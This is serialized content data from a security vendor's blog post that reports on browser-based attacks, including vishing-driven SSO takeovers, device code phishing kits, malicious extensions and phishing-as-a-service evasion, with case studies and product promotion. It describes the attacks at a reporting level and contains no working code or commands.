",[],{},{"nodeType":940,"data":1714,"content":1716},{"uri":1715},"https:\u002F\u002Fsite.dev.pushsecurity.com\u002Fblog\u002F7-things-omdias-latest-report-tells-us-about-the-secure-enterprise-browser-market",[1717],{"nodeType":883,"value":1718,"marks":1719,"data":1720},"according to Omdia",[],{},{"nodeType":883,"value":1722,"marks":1723,"data":1724},", 49% of organizations suffered a successful browser-based attack in the last 12 months, and browser security is now a top-five priority for 88% of organizations. ",[],{},{"nodeType":879,"data":1726,"content":1727},{},[1728],{"nodeType":883,"value":1729,"marks":1730,"data":1731},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",[],{},{"nodeType":879,"data":1733,"content":1734},{},[1735],{"nodeType":883,"value":1736,"marks":1737,"data":1738},"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",[],{},{"nodeType":879,"data":1740,"content":1741},{},[1742,1746,1755],{"nodeType":883,"value":1743,"marks":1744,"data":1745},"If you want to learn more about how Push helps you to detect and stop attacks in the browser, ",[],{},{"nodeType":940,"data":1747,"content":1749},{"uri":1748},"https:\u002F\u002Fpushsecurity.com\u002Fdemo?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[1750],{"nodeType":883,"value":1751,"marks":1752,"data":1754},"book some time with one of our team for a live demo",[1753],{"type":948},{},{"nodeType":883,"value":1350,"marks":1756,"data":1757},[],{},{"entries":1759},{"hyperlink":1760,"inline":1761,"block":1762},[],[],[1763,1771,1776,1783,1803,1846,1876,1895,1939],{"sys":1764,"__typename":1765,"title":1766,"caption":1766,"layoutMode":59,"file":1767},{"id":975},"Image","Attacks have shifted from targeting local networks to internet services, accessed through employee web browsers.",{"url":1768,"width":1769,"height":1770},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2TRbV3HLZRt0pjgxPAPUOY\u002F5dbeec4b4ac16a3b450e1eff2add6266\u002F1.png",1174,482,{"sys":1772,"__typename":1773,"title":1774,"youTubeUrl":1775},{"id":1048},"EmbeddedVideo","Push Explains: The Evolution of Phishing","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=t3UaE58LvYA",{"sys":1777,"__typename":1765,"title":1778,"caption":1778,"layoutMode":59,"file":1779},{"id":1068},"Phishing is now multi- and cross-channel, targeting a vast range of cloud and SaaS apps using flexible AitM toolkits — but all roads inevitably lead to the browser.",{"url":1780,"width":1781,"height":1782},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1Fq4iSo4ssD0bdINZ4M31q\u002F28d89ce5b8af767b37d2acb54a1c78cf\u002F2.png",1999,1003,{"sys":1784,"__typename":1785,"content":1786,"name":1802,"title":59},{"id":1115},"InsightTextBlockComponent",{"json":1787},{"nodeType":875,"data":1788,"content":1789},{},[1790],{"nodeType":879,"data":1791,"content":1792},{},[1793,1798],{"nodeType":883,"value":1794,"marks":1795,"data":1797},"Case study: Scattered Lapsus$ Hunters' (SLH) real-time AiTM campaign. ",[1796],{"type":916},{},{"nodeType":883,"value":1799,"marks":1800,"data":1801},"SLH targeted 100+ companies — including Betterment, Crunchbase, SoundCloud, and Match Group — with tens of millions of records stolen as a result. Powered by real-time operated kits where attackers walk victims through the login in real time via voice phishing, these attacks combine a branded phishing page, real-time session relay, persistent passkey registration by the attacker for ongoing access, and a confirmation email to reduce suspicion — followed by mass data exfiltration from enterprise cloud and SaaS. ",[],{},"6 browser attacks IB1",{"sys":1804,"__typename":1785,"content":1805,"name":1845,"title":59},{"id":1223},{"json":1806},{"nodeType":875,"data":1807,"content":1808},{},[1809],{"nodeType":879,"data":1810,"content":1811},{},[1812,1817,1821,1829,1833,1841],{"nodeType":883,"value":1813,"marks":1814,"data":1816},"Case study: InstallFix — AI-themed lures take advantage of users looking to install AI tools. ",[1815],{"type":916},{},{"nodeType":883,"value":1818,"marks":1819,"data":1820},"Push discovered and named ",[],{},{"nodeType":940,"data":1822,"content":1824},{"uri":1823},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finstallfix",[1825],{"nodeType":883,"value":1826,"marks":1827,"data":1828},"InstallFix",[],{},{"nodeType":883,"value":1830,"marks":1831,"data":1832},", involving malicious imitations of popular AI tool pages, including Claude Code and NotebookLM, being distributed over search engines via malvertising. Because these tools are often installed via command-line script, attackers created pixel-perfect clones of real pages where the install instructions had been replaced with a malicious command. Running the command installed infostealer malware on the victim's machine. The later ",[],{},{"nodeType":940,"data":1834,"content":1836},{"uri":1835},"https:\u002F\u002Fsite.dev.pushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign",[1837],{"nodeType":883,"value":1838,"marks":1839,"data":1840},"LLMShare",[],{},{"nodeType":883,"value":1842,"marks":1843,"data":1844}," campaign we identified used a similar pattern, but combined it with shared chat artefacts on Claude and ChatGPT for added legitimacy. ",[],{},"Browser attacks update IB3",{"sys":1847,"__typename":1785,"content":1848,"name":1875,"title":59},{"id":1364},{"json":1849},{"data":1850,"content":1851,"nodeType":875},{},[1852],{"data":1853,"content":1854,"nodeType":879},{},[1855,1860,1864,1871],{"data":1856,"marks":1857,"value":1859,"nodeType":883},{},[1858],{"type":916},"Case study: Mass Salesforce breaches via device code phishing. ",{"data":1861,"marks":1862,"value":1863,"nodeType":883},{},[],"Scattered Lapsus$ Hunters' 2025 Salesforce campaign resulted in a claimed ",{"data":1865,"content":1866,"nodeType":940},{"uri":960},[1867],{"data":1868,"marks":1869,"value":1870,"nodeType":883},{},[],"1,000+ organizations compromised and 1.5 billion records stolen",{"data":1872,"marks":1873,"value":1874,"nodeType":883},{},[]," — used to extort victims en masse, including an attempt against Salesforce directly. Attackers registered a malicious Salesforce app called \"DataLoader\" (a fake version of the legitimate app), called victims impersonating IT, and talked them through opening Salesforce and authorizing the new app. The app had broad OAuth scopes — full Salesforce API access and refresh tokens without re-auth — enabling mass data exfiltration via API. The stolen data was then used in further supply chain attacks against downstream organizations.","Browser attacks update IB4",{"sys":1877,"__typename":1785,"content":1878,"name":1894,"title":59},{"id":1466},{"json":1879},{"nodeType":875,"data":1880,"content":1881},{},[1882],{"nodeType":879,"data":1883,"content":1884},{},[1885,1890],{"nodeType":883,"value":1886,"marks":1887,"data":1889},"Case study: DarkSpectre — China-linked extension campaign spanning 7 years and 8.8 million victims. ",[1888],{"type":916},{},{"nodeType":883,"value":1891,"marks":1892,"data":1893},"DarkSpectre is a China-attributed threat actor that operated three coordinated malicious browser extension campaigns across Chrome, Edge, and Firefox for over seven years, compromising 8.8 million users before being exposed in December 2025. The actor published functional extensions — new tab dashboards, video downloaders, meeting productivity tools — that operated legitimately for 3–5 years, building install bases in the millions and earning Chrome Web Store \"Verified\" badges. Once an extension had a large enough user base, the actor pushed malicious payloads through server-side configuration changes, gated behind a 3-day dormancy timer and executed on only ~10% of page loads to reduce detection surface. At discovery, 85 additional \"sleeper\" extensions were still in this trust-building phase.",[],{},"Browser attacks update IB5",{"sys":1896,"__typename":1785,"content":1897,"name":1938,"title":59},{"id":1617},{"json":1898},{"nodeType":875,"data":1899,"content":1900},{},[1901],{"nodeType":879,"data":1902,"content":1903},{},[1904,1909,1913,1920,1924,1929,1933],{"nodeType":883,"value":1905,"marks":1906,"data":1908},"Case study: Snowflake. ",[1907],{"type":916},{},{"nodeType":883,"value":1910,"marks":1911,"data":1912},"ShinyHunters (part of Scattered Lapsus$ Hunters) breached ",[],{},{"nodeType":940,"data":1914,"content":1915},{"uri":942},[1916],{"nodeType":883,"value":1917,"marks":1918,"data":1919},"165+ organizations",[],{},{"nodeType":883,"value":1921,"marks":1922,"data":1923}," using stolen credentials, logging into their Snowflake tenants and mass-dumping data via direct SQL commands. The attacker harvested credentials from underground marketplaces, identified platform-wide MFA gaps, developed a script for rapid exploitation, and executed a mass credential-stuffing campaign — ultimately stealing over ",[],{},{"nodeType":883,"value":1925,"marks":1926,"data":1928},"1 billion records from just 9 publicly named victims",[1927],{"type":916},{},{"nodeType":883,"value":1930,"marks":1931,"data":1932},", with the real impact likely far greater. ",[],{},{"nodeType":883,"value":1934,"marks":1935,"data":1937},"80% of compromised accounts had prior breach exposure in datasets dating back to 2020.",[1936],{"type":916},{},"Browser attacks update IB6",{"sys":1940,"__typename":1785,"content":1941,"name":1957,"title":59},{"id":1693},{"json":1942},{"nodeType":875,"data":1943,"content":1944},{},[1945],{"nodeType":879,"data":1946,"content":1947},{},[1948,1953],{"nodeType":883,"value":1949,"marks":1950,"data":1952},"Case study: Okta session theft cascades into customer compromise. ",[1951],{"type":916},{},{"nodeType":883,"value":1954,"marks":1955,"data":1956},"In 2023, an Okta support engineer was infected with infostealer malware. The attacker (reportedly Scattered Spider) accessed Okta's customer support system and exfiltrated sensitive files containing session tokens — then replayed those tokens to access customer environments. Corporate credentials had been synced to the engineer's personal Google account via Chrome profile sync and were stolen along with everything else. The attacker signed into Okta's customer support portal using the synced credentials, downloaded HAR files containing active customer session tokens, and accessed 134 downstream customer Okta tenants, moving laterally into connected apps. BeyondTrust, 1Password, and Cloudflare all reported further activity. Cloudflare saw attackers access their internal Atlassian, including Confluence, Jira, and Bitbucket source code. A key lesson: business credentials can transit personal and managed devices through features like Chrome profile sync — easy to enable, hard to track.",[],{},"Browser attacks update IB7",{"items":1959},[],{},"6 browser-based attacks security teams need to know about","thought-leadership","2026-09-15T00:00:00.000Z",{"items":1965},[1966,3281,3935],{"__typename":1967,"sys":1968,"content":1970,"title":3264,"synopsis":3265,"hashTags":59,"publishedDate":3266,"slug":3267,"tagsCollection":3268,"authorsCollection":3277},"BlogPosts",{"id":1969},"vLb3RhwYt7Xc6mkX3pWyI",{"json":1971},{"data":1972,"content":1973,"nodeType":875},{},[1974,1981,1984,1992,2022,2030,2036,2067,2182,2223,2231,2286,2317,2323,2326,2334,2341,2349,2366,2421,2427,2434,2453,2459,2466,2472,2479,2485,2492,2498,2506,2549,2580,2599,2630,2638,2669,2700,2731,2739,2746,2765,2819,2850,2858,2876,2919,2922,2930,2937,2944,2962,2968,2975,3087,3129,3137,3156,3163,3166,3174,3181,3224,3231,3234,3240,3246],{"data":1975,"content":1976,"nodeType":879},{},[1977],{"data":1978,"marks":1979,"value":1980,"nodeType":883},{},[],"Feeling overwhelmed with the amount of cyber news stories? Tired of dodging AI vendors boasting about their agents escaping the lab? This threat landscape update cuts through the noise and covers the key developments that security teams need to be on top of.",{"data":1982,"content":1983,"nodeType":905},{},[],{"data":1985,"content":1986,"nodeType":909},{},[1987],{"data":1988,"marks":1989,"value":1991,"nodeType":883},{},[1990],{"type":916},"The SLH playbook becomes the industry standard",{"data":1993,"content":1994,"nodeType":879},{},[1995,1999,2007,2011,2018],{"data":1996,"marks":1997,"value":1998,"nodeType":883},{},[],"Criminals associated with \"The Com,\" broadly known as the ",{"data":2000,"content":2002,"nodeType":940},{"uri":2001},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-lapsus-hunters",[2003],{"data":2004,"marks":2005,"value":2006,"nodeType":883},{},[],"Scattered Lapsus$ Hunters",{"data":2008,"marks":2009,"value":2010,"nodeType":883},{},[]," collective, have spent the past three years establishing a playbook ",{"data":2012,"content":2013,"nodeType":940},{"uri":960},[2014],{"data":2015,"marks":2016,"value":2017,"nodeType":883},{},[],"focused on identity compromise and cloud data theft",{"data":2019,"marks":2020,"value":2021,"nodeType":883},{},[]," for extortion. They've dominated the news when it comes to public breaches: a sign of their effectiveness, or perhaps more their desire for notoriety (something that has come back to bite individuals later with a series of arrests, but hasn't hampered the overall trajectory of the breaches).",{"data":2023,"content":2024,"nodeType":879},{},[2025],{"data":2026,"marks":2027,"value":2029,"nodeType":883},{},[2028],{"type":916},"Regardless, the data doesn't lie. Of the browser and identity-related breaches we've tracked, groups linked to \"The Com\" such as Scattered Spider, ShinyHunters, and Lapsus$ are responsible for roughly 70% (not just in 2026, but since the start of 2024). ",{"data":2031,"content":2035,"nodeType":971},{"target":2032},{"sys":2033},{"id":2034,"type":976,"linkType":977},"3hODobO3VJr3LvbXkzso8I",[],{"data":2037,"content":2038,"nodeType":879},{},[2039,2043,2051,2055,2063],{"data":2040,"marks":2041,"value":2042,"nodeType":883},{},[],"The trump card of prolific criminal groups like Scattered Spider, Lapsus$, and ShinyHunters has always been their social engineering skill. Last year, they had huge success in ",{"data":2044,"content":2046,"nodeType":940},{"uri":2045},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-spider-defending-against-help-desk-scams",[2047],{"data":2048,"marks":2049,"value":2050,"nodeType":883},{},[],"tricking help desks into performing account resets",{"data":2052,"marks":2053,"value":2054,"nodeType":883},{},[],". This year, they've switched to using voice-based lures in tandem with ",{"data":2056,"content":2058,"nodeType":940},{"uri":2057},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-latest-slh-campaign",[2059],{"data":2060,"marks":2061,"value":2062,"nodeType":883},{},[],"browser-based phishing payloads",{"data":2064,"marks":2065,"value":2066,"nodeType":883},{},[]," — usually impersonating IT staff under the guise of \"setting up passkeys.\"",{"data":2068,"content":2069,"nodeType":879},{},[2070,2074,2082,2086,2094,2098,2106,2110,2118,2122,2130,2134,2142,2146,2154,2158,2166,2170,2178],{"data":2071,"marks":2072,"value":2073,"nodeType":883},{},[],"The vishing-to-SSO-takeover campaign has been prolific, running continuously since January: ",{"data":2075,"content":2077,"nodeType":940},{"uri":2076},"https:\u002F\u002Fwww.securityweek.com\u002Fpanera-bread-data-breach-linked-to-shinyhunters-sso-campaign\u002F",[2078],{"data":2079,"marks":2080,"value":2081,"nodeType":883},{},[],"Panera Bread",{"data":2083,"marks":2084,"value":2085,"nodeType":883},{},[]," (~14M records), ",{"data":2087,"content":2089,"nodeType":940},{"uri":2088},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmatch-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match\u002F",[2090],{"data":2091,"marks":2092,"value":2093,"nodeType":883},{},[],"Match Group",{"data":2095,"marks":2096,"value":2097,"nodeType":883},{},[]," (Hinge, Tinder, OkCupid; 10M+ records), ",{"data":2099,"content":2101,"nodeType":940},{"uri":2100},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fexpansion-shinyhunters-saas-data-theft",[2102],{"data":2103,"marks":2104,"value":2105,"nodeType":883},{},[],"Betterment",{"data":2107,"marks":2108,"value":2109,"nodeType":883},{},[]," (~20M records), ",{"data":2111,"content":2113,"nodeType":940},{"uri":2112},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fshinyhunters-extortion-gang-claims-odido-breach-affecting-millions\u002F",[2114],{"data":2115,"marks":2116,"value":2117,"nodeType":883},{},[],"Odido",{"data":2119,"marks":2120,"value":2121,"nodeType":883},{},[]," (6.2M Dutch telecom customers with BSNs and IBANs exposed), ",{"data":2123,"content":2125,"nodeType":940},{"uri":2124},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fadt-confirms-data-breach-after-shinyhunters-leak-threat\u002F",[2126],{"data":2127,"marks":2128,"value":2129,"nodeType":883},{},[],"ADT",{"data":2131,"marks":2132,"value":2133,"nodeType":883},{},[]," (5.5M records), ",{"data":2135,"content":2137,"nodeType":940},{"uri":2136},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcharter-communications-data-breach-affects-49-million-accounts\u002F",[2138],{"data":2139,"marks":2140,"value":2141,"nodeType":883},{},[],"Charter Communications",{"data":2143,"marks":2144,"value":2145,"nodeType":883},{},[]," (4.9M accounts), ",{"data":2147,"content":2149,"nodeType":940},{"uri":2148},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F24\u002Fshinyhunters_claim_cruise_giant_carnivals\u002F",[2150],{"data":2151,"marks":2152,"value":2153,"nodeType":883},{},[],"Carnival Corporation",{"data":2155,"marks":2156,"value":2157,"nodeType":883},{},[]," (6M records), and",{"data":2159,"content":2161,"nodeType":940},{"uri":2160},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F28\u002Fpitney_bowes_is_the_latest\u002F",[2162],{"data":2163,"marks":2164,"value":2165,"nodeType":883},{},[]," Pitney Bowes",{"data":2167,"marks":2168,"value":2169,"nodeType":883},{},[]," (8.2M emails per HIBP). ",{"data":2171,"content":2173,"nodeType":940},{"uri":2172},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fad-tech-firm-optimizely-confirms-data-breach-after-vishing-attack\u002F",[2174],{"data":2175,"marks":2176,"value":2177,"nodeType":883},{},[],"Optimizely",{"data":2179,"marks":2180,"value":2181,"nodeType":883},{},[]," is notable as the first confirmed case where attackers deployed both AiTM credential harvesting and device code phishing against the same target.",{"data":2183,"content":2184,"nodeType":879},{},[2185,2189,2196,2200,2208,2212,2220],{"data":2186,"marks":2187,"value":2188,"nodeType":883},{},[],"Since mid-2025, SaaS apps like Salesforce have been a persistent target for data theft and extortion — as seen in the first large-scale criminal ",{"data":2190,"content":2191,"nodeType":940},{"uri":1298},[2192],{"data":2193,"marks":2194,"value":2195,"nodeType":883},{},[],"device code phishing",{"data":2197,"marks":2198,"value":2199,"nodeType":883},{},[]," campaign that preceded this year's adoption spike. ShinyHunters also led the way with OAuth supply chain abuse — compromising SaaS vendors like ",{"data":2201,"content":2203,"nodeType":940},{"uri":2202},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fdata-theft-salesforce-instances-via-salesloft-drift",[2204],{"data":2205,"marks":2206,"value":2207,"nodeType":883},{},[],"Salesloft, Drift, and GainSight",{"data":2209,"marks":2210,"value":2211,"nodeType":883},{},[]," and leveraging stored OAuth tokens to penetrate downstream customer environments, a pattern that has since ",{"data":2213,"content":2215,"nodeType":940},{"uri":2214},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach",[2216],{"data":2217,"marks":2218,"value":2219,"nodeType":883},{},[],"repeated at scale",{"data":2221,"marks":2222,"value":1350,"nodeType":883},{},[],{"data":2224,"content":2225,"nodeType":1036},{},[2226],{"data":2227,"marks":2228,"value":2230,"nodeType":883},{},[2229],{"type":916},"Copycats and nation-state adoption",{"data":2232,"content":2233,"nodeType":879},{},[2234,2238,2246,2250,2258,2262,2270,2274,2282],{"data":2235,"marks":2236,"value":2237,"nodeType":883},{},[],"Wider groups are now running the SLH playbook independently. ",{"data":2239,"content":2241,"nodeType":940},{"uri":2240},"https:\u002F\u002Fhackread.com\u002Fpink-extortion-microsoft-365-cloud-data-vishing-scams\u002F",[2242],{"data":2243,"marks":2244,"value":2245,"nodeType":883},{},[],"Pink",{"data":2247,"marks":2248,"value":2249,"nodeType":883},{},[]," (the latest rebrand in the",{"data":2251,"content":2253,"nodeType":940},{"uri":2252},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Func6671-targets-financial-services-and-enterprise-cloud-environments",[2254],{"data":2255,"marks":2256,"value":2257,"nodeType":883},{},[]," BlackFile",{"data":2259,"marks":2260,"value":2261,"nodeType":883},{},[],"-Redact succession) runs vishing combined with passkey-themed credential phishing for M365 extortion. ",{"data":2263,"content":2265,"nodeType":940},{"uri":2264},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-helix-vishing-group-emerges-in-sharepoint-data-theft-attacks\u002F",[2266],{"data":2267,"marks":2268,"value":2269,"nodeType":883},{},[],"Helix",{"data":2271,"marks":2272,"value":2273,"nodeType":883},{},[]," also emerged shortly after BlackFile shut down, pairing vishing with device code phishing and MFA registration for persistence. ",{"data":2275,"content":2277,"nodeType":940},{"uri":2276},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fkongtuke-hackers-now-use-microsoft-teams-for-corporate-breaches\u002F",[2278],{"data":2279,"marks":2280,"value":2281,"nodeType":883},{},[],"KongTuke",{"data":2283,"marks":2284,"value":2285,"nodeType":883},{},[],", an independent initial access broker, adopted a similar help-desk impersonation model via Teams external messaging.",{"data":2287,"content":2288,"nodeType":879},{},[2289,2293,2301,2305,2313],{"data":2290,"marks":2291,"value":2292,"nodeType":883},{},[],"It's not just criminal groups either. Recently, we saw a campaign linked to Russian actors that used ",{"data":2294,"content":2296,"nodeType":940},{"uri":2295},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F07\u002F31\u002Fcaptivecrunch-midnight-blizzard-targets-travelers-worldwide-for-malware-delivery-and-credential-theft\u002F",[2297],{"data":2298,"marks":2299,"value":2300,"nodeType":883},{},[],"compromised hotel and conference Wi-Fi gateways",{"data":2302,"marks":2303,"value":2304,"nodeType":883},{},[]," to direct victims to AiTM, ClickFix, and device code phishing pages. And ",{"data":2306,"content":2308,"nodeType":940},{"uri":2307},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fchinese-language-phishing-services\u002F",[2309],{"data":2310,"marks":2311,"value":2312,"nodeType":883},{},[],"Google Threat Intelligence mapped",{"data":2314,"marks":2315,"value":2316,"nodeType":883},{},[]," a dozen Chinese-language PhaaS platforms with real-time MFA interception.",{"data":2318,"content":2322,"nodeType":971},{"target":2319},{"sys":2320},{"id":2321,"type":976,"linkType":977},"6q2NwH6Q4DJE7RNeYheIvJ",[],{"data":2324,"content":2325,"nodeType":905},{},[],{"data":2327,"content":2328,"nodeType":909},{},[2329],{"data":2330,"marks":2331,"value":2333,"nodeType":883},{},[2332],{"type":916},"Phishing infrastructure has reached an industrial scale",{"data":2335,"content":2336,"nodeType":879},{},[2337],{"data":2338,"marks":2339,"value":2340,"nodeType":883},{},[],"The SLH playbook works because it sits on top of an industrialized infrastructure layer that continues to grow. Phishing-as-a-Service platforms, device code phishing kits, ClickFix Malware-as-a-Service providers, vishing operations, and OAuth supply chain attacks have all matured into commodity services — and they're shipping faster than ever.",{"data":2342,"content":2343,"nodeType":1036},{},[2344],{"data":2345,"marks":2346,"value":2348,"nodeType":883},{},[2347],{"type":916},"Device code phishing goes mainstream",{"data":2350,"content":2351,"nodeType":879},{},[2352,2356,2362],{"data":2353,"marks":2354,"value":2355,"nodeType":883},{},[],"We're tracking a huge spike in ",{"data":2357,"content":2358,"nodeType":940},{"uri":1298},[2359],{"data":2360,"marks":2361,"value":2195,"nodeType":883},{},[],{"data":2363,"marks":2364,"value":2365,"nodeType":883},{},[]," since the start of 2026, with 25+ distinct kits now offering the technique. At the beginning of the year, we were tracking one or two.",{"data":2367,"content":2368,"nodeType":879},{},[2369,2373,2381,2385,2393,2397,2405,2409,2417],{"data":2370,"marks":2371,"value":2372,"nodeType":883},{},[],"What began with ",{"data":2374,"content":2376,"nodeType":940},{"uri":2375},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F02\u002F13\u002Fstorm-2372-conducts-device-code-phishing-campaign\u002F",[2377],{"data":2378,"marks":2379,"value":2380,"nodeType":883},{},[],"Storm-2372's nation-state campaigns",{"data":2382,"marks":2383,"value":2384,"nodeType":883},{},[]," in August 2024 has proliferated through criminal kits like ",{"data":2386,"content":2388,"nodeType":940},{"uri":2387},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002Fthe-new-phishing-click-how-oauth-consent.html",[2389],{"data":2390,"marks":2391,"value":2392,"nodeType":883},{},[],"EvilTokens",{"data":2394,"marks":2395,"value":2396,"nodeType":883},{},[]," (340+ organizations in its first five weeks), ",{"data":2398,"content":2400,"nodeType":940},{"uri":2399},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fkali365-device-code-phishing-kit",[2401],{"data":2402,"marks":2403,"value":2404,"nodeType":883},{},[],"Kali365",{"data":2406,"marks":2407,"value":2408,"nodeType":883},{},[]," (which earned an FBI public advisory), ",{"data":2410,"content":2412,"nodeType":940},{"uri":2411},"https:\u002F\u002Fblog.talosintelligence.com\u002Fartoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365\u002F",[2413],{"data":2414,"marks":2415,"value":2416,"nodeType":883},{},[],"ARToken",{"data":2418,"marks":2419,"value":2420,"nodeType":883},{},[],", DEBULL, Forg365, and many more.",{"data":2422,"content":2426,"nodeType":971},{"target":2423},{"sys":2424},{"id":2425,"type":976,"linkType":977},"7G6ytXRQPWatOyYarqgMK2",[],{"data":2428,"content":2429,"nodeType":879},{},[2430],{"data":2431,"marks":2432,"value":2433,"nodeType":883},{},[],"The existing PhaaS marketplace, previously dominated by AiTM phishing kits as the standard, has also pivoted to take advantage of the demand for the technique.",{"data":2435,"content":2436,"nodeType":879},{},[2437,2441,2449],{"data":2438,"marks":2439,"value":2440,"nodeType":883},{},[],"Established AiTM vendors like Tycoon 2FA have ",{"data":2442,"content":2444,"nodeType":940},{"uri":2443},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing\u002F",[2445],{"data":2446,"marks":2447,"value":2448,"nodeType":883},{},[],"added device code phishing",{"data":2450,"marks":2451,"value":2452,"nodeType":883},{},[]," alongside their existing credential-harvesting capabilities, meaning the same platforms now offer both techniques interchangeably based on what works against a given target. Several kits like Venom, EvilTokens, Kali365 all reportedly offer both capabilities, while many of the detections we see match the signatures for existing kits in our database (for example, with Venom triggering our existing Sneaky2FA detections) — suggesting an overlap in kit developers or their codebases.",{"data":2454,"content":2458,"nodeType":971},{"target":2455},{"sys":2456},{"id":2457,"type":976,"linkType":977},"3urXbEwK0OSjXQ7lOMDEoc",[],{"data":2460,"content":2461,"nodeType":879},{},[2462],{"data":2463,"marks":2464,"value":2465,"nodeType":883},{},[],"When you look at the full picture, it's notable to see a mixture of AiTM and device code kits in our top detected kits, with most of the top 5 now offering both.",{"data":2467,"content":2471,"nodeType":971},{"target":2468},{"sys":2469},{"id":2470,"type":976,"linkType":977},"4ipTS2U4HE1VLSLmA6DJgB",[],{"data":2473,"content":2474,"nodeType":879},{},[2475],{"data":2476,"marks":2477,"value":2478,"nodeType":883},{},[],"PhaaS vendors are pivoting because device code phishing defeats all MFA (including passkeys) by targeting the authorization layer rather than the login. It's also an unfamiliar phishing scenario that most people aren't really prepared for.",{"data":2480,"content":2484,"nodeType":971},{"target":2481},{"sys":2482},{"id":2483,"type":976,"linkType":977},"3UDzUCCizPJhXp3SsoZuSK",[],{"data":2486,"content":2487,"nodeType":879},{},[2488],{"data":2489,"marks":2490,"value":2491,"nodeType":883},{},[],"And because they're being used interchangeably, there's no downside for the attacker. In one recent example, we saw the attack automatically fall back to AiTM after the device code method timed out, giving the operator two shots at the same victim without manual intervention.",{"data":2493,"content":2497,"nodeType":971},{"target":2494},{"sys":2495},{"id":2496,"type":976,"linkType":977},"3SPsKzwBNxl4d9QRukBtwt",[],{"data":2499,"content":2500,"nodeType":1036},{},[2501],{"data":2502,"marks":2503,"value":2505,"nodeType":883},{},[2504],{"type":916},"PhaaS platform evolution and evasion",{"data":2507,"content":2508,"nodeType":879},{},[2509,2513,2521,2525,2533,2537,2545],{"data":2510,"marks":2511,"value":2512,"nodeType":883},{},[],"The broader PhaaS ecosystem continues to expand and evolve. New platform launches this quarter include ",{"data":2514,"content":2516,"nodeType":940},{"uri":2515},"https:\u002F\u002Fwww.cloudsek.com\u002Fblog\u002Fbluekit-phishing-as-a-service-phaas",[2517],{"data":2518,"marks":2519,"value":2520,"nodeType":883},{},[],"Bluekit",{"data":2522,"marks":2523,"value":2524,"nodeType":883},{},[],", ",{"data":2526,"content":2528,"nodeType":940},{"uri":2527},"https:\u002F\u002Fabnormal.ai\u002Fblog\u002Fblacksite-aitm-phishing-kit-cloaked-gg",[2529],{"data":2530,"marks":2531,"value":2532,"nodeType":883},{},[],"Blacksite and Cloaked.gg",{"data":2534,"marks":2535,"value":2536,"nodeType":883},{},[]," — offering dedicated anti-scanner cloaking as a service for phishing infrastructure — and ",{"data":2538,"content":2540,"nodeType":940},{"uri":2539},"https:\u002F\u002Fthreatactix.com\u002F2026\u002F07\u002F02\u002Fa-rare-look-inside-the-command-and-control-panel-behind-modern-phishing-operations\u002F",[2541],{"data":2542,"marks":2543,"value":2544,"nodeType":883},{},[],"WackoGinx",{"data":2546,"marks":2547,"value":2548,"nodeType":883},{},[],", a multi-platform C2 panel that enables operators to manage simultaneous phishing campaigns.",{"data":2550,"content":2551,"nodeType":879},{},[2552,2556,2564,2568,2576],{"data":2553,"marks":2554,"value":2555,"nodeType":883},{},[],"Sneaky 2FA changes have also been documented, with what ",{"data":2557,"content":2559,"nodeType":940},{"uri":2558},"https:\u002F\u002Fzerobec.com\u002Fblog\u002Fsneaky-2fa-returns-trusted-sender-tenant-branded-microsoft-365-replay",[2560],{"data":2561,"marks":2562,"value":2563,"nodeType":883},{},[],"ZeroBEC calls \"route polymorphism\"",{"data":2565,"marks":2566,"value":2567,"nodeType":883},{},[]," (a complicated way of saying the kit randomizes URL paths and filenames on every visit) while separately adopting ",{"data":2569,"content":2571,"nodeType":940},{"uri":2570},"https:\u002F\u002Fblog.barracuda.com\u002F2026\u002F06\u002F29\u002Femail-threat-radar-june-2026",[2572],{"data":2573,"marks":2574,"value":2575,"nodeType":883},{},[],"split-click buttons and blob URLs",{"data":2577,"marks":2578,"value":2579,"nodeType":883},{},[]," designed to evade link analysis (where buttons have two links: automated scanners interact with one and see a legitimate Microsoft page, but humans naturally click the larger, more visually prominent bottom one and get routed via a blob URL to the phishing page). 